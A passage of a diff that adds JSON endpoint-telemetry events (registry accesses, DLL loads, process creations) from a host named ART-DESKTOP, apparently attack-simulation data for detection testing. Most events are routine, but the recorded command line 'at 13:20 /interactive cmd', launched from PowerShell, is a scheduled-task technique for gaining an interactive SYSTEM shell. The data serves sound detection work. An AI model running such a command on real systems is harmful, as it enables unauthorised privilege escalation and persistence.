"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupSvc.dll", + "image_path": "C:\\Windows\\System32\\NetSetupSvc.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\State", + "registry_value": "State", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794180000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", + "registry_value": "Interfaces", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ImplatSetup.dll", + "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System", + "registry_path": "HKLM\\System\\CurrentControlSet", + "registry_value": "CurrentControlSet", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ImplatSetup.dll", + "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", + "registry_value": "Interfaces", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7672, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573803250000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "command_line": "at 13:20 /interactive cmd", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5964, + "ppid": 7672, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "subtype": "create", + "timestamp": 131883573803349984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}", + "unique_ppid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 